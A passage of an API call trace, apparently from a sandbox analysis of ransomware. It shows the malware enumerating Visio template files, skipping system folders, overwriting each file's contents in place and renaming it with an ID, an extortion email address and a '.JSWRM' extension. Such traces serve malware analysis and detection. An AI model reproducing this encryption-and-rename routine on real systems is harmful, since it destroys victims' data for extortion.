lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0147.751] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.751] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0147.752] CloseHandle (hObject=0x314) returned 1 [0147.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0147.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0147.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0147.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0147.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0147.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0147.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0147.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0147.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.752] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DWGCNV_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dwgcnv_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DWGCNV_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dwgcnv_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0147.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0147.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0147.754] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x26b22, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DWGCNV_U.VSTX", cAlternateFileName="DWGCNV~1.VST")) returned 1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2=".") returned 1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2="..") returned 1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2="...") returned 1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2="windows") returned -1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2="recovery") returned -1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2="perflogs") returned -1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2="documents and settings") returned 1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2="system volume information") returned -1 [0147.754] lstrcmpiW (lpString1="DWGCNV_U.VSTX", lpString2="msocache") returned -1 [0147.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0147.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGCNV_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0147.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0147.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DWGCNV_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DWGCNV_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0147.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0147.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0147.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0147.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DWGCNV_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dwgcnv_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.756] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=158498) returned 1 [0147.756] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x26b20) returned 0x2501e8 [0147.756] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x26b20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x26b20, lpOverlapped=0x0) returned 1 [0147.766] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.766] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x26b20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x26b20, lpOverlapped=0x0) returned 1 [0147.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.767] CloseHandle (hObject=0x314) returned 1 [0147.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0147.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0147.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0147.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0147.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0147.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0147.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0147.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0147.767] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DWGCNV_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dwgcnv_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DWGCNV_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dwgcnv_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0147.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0147.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0147.768] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37a533b, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x37a533b, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x37a533b, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2367a, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EECHIP_M.VSSX", cAlternateFileName="EECHIP~2.VSS")) returned 1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2=".") returned 1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2="..") returned 1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2="...") returned 1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2="windows") returned -1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2="recovery") returned -1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2="perflogs") returned -1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2="documents and settings") returned 1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2="system volume information") returned -1 [0147.769] lstrcmpiW (lpString1="EECHIP_M.VSSX", lpString2="msocache") returned -1 [0147.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0147.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECHIP_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0147.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0147.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECHIP_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0147.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0147.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0147.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0147.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.770] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=145018) returned 1 [0147.770] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23670) returned 0x2501e8 [0147.770] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x23670, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x23670, lpOverlapped=0x0) returned 1 [0147.780] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.780] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x23670, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x23670, lpOverlapped=0x0) returned 1 [0147.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0147.782] CloseHandle (hObject=0x314) returned 1 [0147.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0147.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0147.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0147.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0147.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0147.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0147.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0147.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0147.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0147.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.783] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0147.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0147.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0147.784] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a6bc7c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a6bc7c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a6bc7c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3e50, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EECHIP_M.VSTX", cAlternateFileName="EECHIP~1.VST")) returned 1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2=".") returned 1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2="..") returned 1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2="...") returned 1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2="windows") returned -1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2="recovery") returned -1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2="perflogs") returned -1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2="documents and settings") returned 1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2="system volume information") returned -1 [0147.784] lstrcmpiW (lpString1="EECHIP_M.VSTX", lpString2="msocache") returned -1 [0147.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0147.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECHIP_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0147.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0147.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EECHIP_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EECHIP_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0147.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0147.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0147.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0147.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EECHIP_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eechip_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.805] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=15952) returned 1 [0147.805] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3e50) returned 0x27b348 [0147.805] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3e50, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3e50, lpOverlapped=0x0) returned 1 [0147.808] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.808] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3e50, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3e50, lpOverlapped=0x0) returned 1 [0147.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0147.808] CloseHandle (hObject=0x314) returned 1 [0147.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0147.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0147.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0147.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0147.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0147.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0147.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0147.808] RtlAllocateHeap 